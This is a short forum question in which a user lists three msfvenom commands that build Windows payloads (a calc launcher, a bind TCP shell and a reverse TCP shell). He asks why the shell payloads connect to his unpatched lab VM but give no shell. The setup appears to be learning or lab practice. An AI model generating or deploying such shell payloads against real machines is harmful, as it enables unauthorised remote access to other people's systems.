AnsweredAssumed Answered

Windows Payload issues

Question asked by Keith Rozario on Apr 3, 2017

I've having some problems with my payloads.


I used msfvenom to generate the following payloads:

  1. msfvenom -a x86 -p windows/exec CMD=calc.exe -f exe > testcalc-windows-exec.exe
  2. msfvenom -p windows/shell/bind_tcp -f exe > windows-bind-tcp-4444.exe
  3. msfvenom -p windows/shell/reverse_tcp LHOST= LPORT=4000 -f exe > test-win-shell-reverse.exe


I place all 3 exe files into a windows 7 (unpatched) virtual machine--with no AV or Firewall.


(1) works perfectly fine, and calc.exe launches. Good.


(2) creates an open port, but when I login I don't get a shell (am I missing a parameter to bind to cmd or shell?) BAD.


(3) The 'attacked' computer calls back the attacking computer on, (i.e. I can see something connect to my listening ncat port, but nothing else). I can't seem to get a reverse shell---just a reverse connect, and nothing else. BAD.


am I missing something in (2) and (3), I want to run native shells first before proceeding to metepreter etc.